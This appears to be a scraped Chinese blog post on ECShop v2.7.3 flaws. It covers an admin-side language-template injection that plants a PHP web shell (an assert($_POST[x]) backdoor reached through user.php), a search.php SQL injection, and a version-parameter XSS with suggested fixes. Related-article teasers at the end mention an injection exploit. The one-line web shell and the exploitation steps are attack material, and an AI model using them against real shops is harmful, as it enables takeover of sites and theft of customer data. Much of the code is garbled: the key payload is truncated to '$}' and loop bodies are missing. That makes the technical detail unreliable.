1.測試版本
v2.7.3 release 20121106(最新)
v2.7.3 release 20120411
2.漏洞
條件需登入到後台
3.漏洞
利用1) 登陸到台後,選擇模板
1
$}
即生成乙個joychou.php檔案,內容為:
1
2
3
4
5
<?php
assert(
$_post
[x]
);
?>
3) 訪問user.php即可產生shell(不用註冊登入賬戶)
或http://localhost/ecshop_v2.7.3_utf8_release0411/languages/zh_cn/user.php
4.產生原因
在admin\edit_languages.php檔案中第120行,修改變數內容,注意是用的雙引號。
複製**
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
for
(
$i
= 0;
$i
<
count
(
$_post
[
'item_id'
]);
$i
++)
else
}
複製**
修改完後檔案\languages\zh_cn\user.php變數為:注意是雙引號哦
1
$_lang
[
'label_profile'
] =
"使用者資訊$}"
;
由於是雙引號,所以只要在任意的php檔案中引用這個變數,**就會成功執行。
至於為什麼可以執行?原理如下:
下面這三句話都可以執行,與其說**執行,不如說引數執行。
1
2
3
4
5
6
<?php
$a
=
"$"
;
// 有乙個空格
$b
=
"}"
;
// 多一對{},但是沒有空格
$c
=
"}"
;
$d
=
"asdf}"
;
// ?>
7.search.php注入漏洞
search.php
大概300 源
1
if
(is_not_null(
$val
) )
修改為1
if
(is_not_null(
$val
) &&
is_numeric
(
$key
))
就可以了
8.ecshop version xss漏洞
開啟/admin/receive.php檔案中,搜尋如下**:
1
$version
=
$_get
[『version』];
修改為如下**:
1
$version
=htmlspecialchars(
$_get
[『version』]);
Ecshop漏洞及修復
路徑 api client includes lib api.php 參照以下修改 function api userlogin post else end post username isset post userid trim post userid 路徑 admin shopinfo.php ...
ecshop 注入漏洞 利用方法 EXP
注入 購物車中一定需要有物品!登陸目標 註冊,選任意一件商品加入到購物車,然後結算,將下面的 儲存為html就可以注入了 效果如下 ropin 補充一下,如果使用不成功,注意看報錯語句 mysql server error report array 0 array message mysql que...
ECShop 常見問題索引
公升級到v2.7.0後 deprecated function eregi is deprecated in 錯誤解決方法 公升級到v2.7.0後 例外被丟擲且未被接住 解決方法 uc整合問題 duplicate entry for key 的解決方法 檔案許可權的設定 資料庫遷移的mysql4.5...